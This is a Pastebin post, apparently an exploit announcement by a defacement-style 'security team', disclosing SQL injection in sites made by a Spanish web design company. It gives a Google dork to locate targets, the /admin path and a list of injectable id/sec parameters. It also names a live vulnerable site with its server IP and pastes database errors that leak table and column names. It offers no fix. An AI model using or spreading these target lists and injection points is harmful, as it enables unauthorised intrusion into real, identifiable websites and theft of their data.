Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Desarrollado por OxiGenic Web Design Spain SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 15/01/2019
- # Vendor Homepage : oxigenic.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:''Desarrollado por OXIGENIC''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- ####################################################################
- # Admin Panel Login Path :
- *************************
- /admin
- # SQL Injection Exploit :
- ***********************
- /notificacion.php?id=[SQL Injection]
- /noticias.php?id=[SQL Injection]
- /fotogal_cp.php?id=[SQL Injection]
- /fotocp.php?id=[SQL Injection]
- /pesca.php?id=[SQL Injection]
- /fotocp.php?id=[SQL Injection]
- /printentrevista.php?id=[SQL Injection]
- /acto.php?id=[SQL Injection]
- /asoc.php?id=[SQL Injection]
- /cazal.php?sec=[SQL Injection]
- /asocl.php?sec=[SQL Injection]
- /fotoacto.php?id=[SQL Injection]
- ####################################################################
- # Example Vulnerable Site :
- *************************
- [+] bardenasreales.es/notificacion.php?id=41%27 =>
- [ Proof of Concept ] => archive.is/fpP4F
- Note : (149.202.228.232) => There are 403 domains hosted on this server.
- ####################################################################
- # SQL Database Error :
- **********************
- Database error: Invalid SQL: SELECT articulos.id AS id, fecha, tema,
- titulo, subtitulo, texto, foto1, foto1_m, foto2, foto2_p, foto3, foto3_p, foto4,
- foto4_p, foto5, foto5_p, foto6, foto6_p, pie1, pie2, pie3, pie4, pie5, pie6, informa,
- fotosde, notrelacionada1, notrelacionada2, notrelacionada3, enlace1, url1, enlace2, url2,
- enlace3, url3, fuente, urlfuente FROM articulos,temas WHERE
- articulos.activo='1' AND temas.id=articulos.tema AND temas.activo='1' AND articulos.id='126''
- MySQL Error: 1064 (You have an error in your SQL syntax; check the
- manual that corresponds to your MariaDB server version for the
- right syntax to use near ''126''' at line 41)
- Session halted.
- Database error: Invalid SQL: SELECT id, fecha, titulo, texto, informa, foto1
- FROM notificaciones WHERE id='41'' AND activo='1'
- MySQL Error: 1064 (You have an error in your SQL syntax; check the manual
- that corresponds to your MariaDB server version for the
- right syntax to use near '1'' at line 8)
- Session halted.
- Database error: Invalid SQL: SELECT foto, pie
- FROM galerias_cp WHERE id='113'' AND activo='1'
- MySQL Error: 1064 (You have an error in your SQL syntax;
- check the manual that corresponds to your MariaDB server
- version for the right syntax to use near '1'' at line 4)
- Session halted.
- Database error: Invalid SQL: SELECT cazapesca.id AS id, fecha, titulo, subtitulo,
- texto, foto1, foto1_p, pie1, foto2, foto2_p, pie2, foto3, foto3_p, pie3, foto4,
- foto4_p, pie4, foto5, foto5_p, pie5, foto6, foto6_p, pie6, idsubcat, cazapescasubcat.nombre
- AS subsec, idcat FROM cazapesca, cazapescasubcat WHERE cazapesca.activo='1'
- AND cazapescasubcat.id=cazapesca.idsubcat AND cazapescasubcat.idcat='2'
- AND cazapescasubcat.activo='1' AND cazapesca.id='26''
- MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that
- corresponds to your MariaDB server version for the right syntax to use near ''26''' at line 32)
- Session halted.
- Database error: Invalid SQL: SELECT foto as foto, pie as pie FROM
- cazapesca WHERE id='266'' AND activo='1'
- MySQL Error: 1064 (You have an error in your SQL syntax; check the
- manual that corresponds to your MariaDB server version for the right
- syntax to use near '1'' at line 4)
- Session halted.
- Database error: Invalid SQL: SELECT * FROM entrevistas WHERE id='6''
- AND activo='1'
- MySQL Error: 1064 (You have an error in your SQL syntax; check the
- manual that corresponds to your MariaDB server version for the
- right syntax to use near '1'' at line 3)
- Session halted.
- Database error: Invalid SQL: SELECT cazapesca.id AS id, fecha, titulo,
- subtitulo, texto, foto1, foto1_p, pie1, foto2, foto2_p, pie2, foto3, foto3_p, pie3,
- foto4, foto4_p, pie4, foto5, foto5_p, pie5, foto6, foto6_p, pie6, idsubcat,
- cazapescasubcat.nombre AS subsec, idcat FROM cazapesca, cazapescasubcat WHERE
- cazapesca.activo='1' AND cazapescasubcat.id=cazapesca.idsubcat AND
- cazapescasubcat.idcat='3' AND cazapescasubcat.activo='1' AND cazapesca.id='156''
- MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds
- to your MariaDB server version for the right syntax to use near ''156''' at line 32)
- Session halted.
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment